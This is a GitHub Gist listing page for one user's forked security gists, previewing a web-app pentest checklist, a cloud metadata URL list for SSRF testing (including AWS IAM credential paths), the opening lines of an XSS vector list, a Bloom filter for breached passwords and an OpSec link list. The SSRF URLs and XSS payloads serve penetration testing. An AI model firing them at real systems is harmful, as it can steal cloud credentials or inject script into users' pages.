Skip to content

Instantly share code, notes, and snippets.

@xtremebeing
xtremebeing / WAHH_Task_Checklist.md
Created Feb 12, 2021 — forked from gbedoya/WAHH_Task_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
View WAHH_Task_Checklist.md
@xtremebeing
xtremebeing / WAHH_Task_Checklist.md
Created Sep 5, 2020 — forked from jhaddix/WAHH_Task_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
View WAHH_Task_Checklist.md
@xtremebeing
xtremebeing / cloud_metadata.txt
Created Jun 15, 2020 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@xtremebeing
xtremebeing / 666_lines_of_XSS_vectors.html
Created Jun 11, 2020 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
View 666_lines_of_XSS_vectors.html
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@xtremebeing
xtremebeing / bloom.py
Created Jun 11, 2020 — forked from JohnTroony/bloom.py
Simple Bloom filter implementation in Python 3 (for use with the HIBP password list)
View bloom.py
#!/usr/bin/python3
#
# Simple Bloom filter implementation in Python 3
# Copyright 2017 Hector Martin "marcan" <marcan@marcan.st>
# Licensed under the terms of the MIT license
#
# Written to be used with the Have I been pwned? password list:
# https://haveibeenpwned.com/passwords
#
# Download the pre-computed filter here (629MB, k=11, false positive p=0.0005):
@xtremebeing
xtremebeing / OpSec
Created Jun 11, 2020 — forked from JohnTroony/OpSec
Guide for proper Opsec and comsec for the paranoid.
View OpSec
# OPS Info
## Info:
* Google Custom Alerts: http://google.com/alerts/
* Google Reverse Image search instructions: https://support.google.com/websearch/answer/1325808?hl=en
## Antitheft Apps :
* Lookout: https://www.lookout.com/